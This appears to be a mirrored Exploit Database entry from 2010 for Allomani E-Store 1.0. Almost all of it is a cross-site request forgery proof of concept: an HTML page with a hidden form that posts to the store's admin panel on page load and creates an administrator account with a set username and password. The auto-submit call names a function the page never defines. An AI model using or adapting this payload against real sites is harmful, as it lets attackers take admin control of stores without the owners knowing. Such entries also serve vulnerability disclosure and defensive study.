Allomani E-Store 1.0 – Cross-Site Request Forgery (Add Admin) (1)

• Exploit Database
• 9 阅读

• 作者： G0D-F4Th3r
  日期： 2010-06-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14110/

• # Exploit Title: Allomani - E-Store v1.0 - [CSRF] Add Admin Account
  # Date: 29-06-2010
  # Author: G0D-F4Th3r
  # Software Link: http://allomani.com/
  # Version: 1.0
  
  ####################################################
  <html>
  <body onload="javascript:fireForms()">
  <form method="POST" name="form0" action="
  http://www.site.com/[path]/admin/index.php">
  <input type="hidden" name="action" value="adduserok"/>
  <input type="hidden" name="username" value="test"/>
  <input type="hidden" name="password" value="test123"/>
  <input type="hidden" name="email" value="test@test.com"/>
  <input type="hidden" name="group_id" value="1"/>
  <input type="hidden" name="useraddbutton" value="اضافة"/>
  </form>
  </body>
  </html>
  ##################################################################################
  Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My
  Friends
  ##################################################################################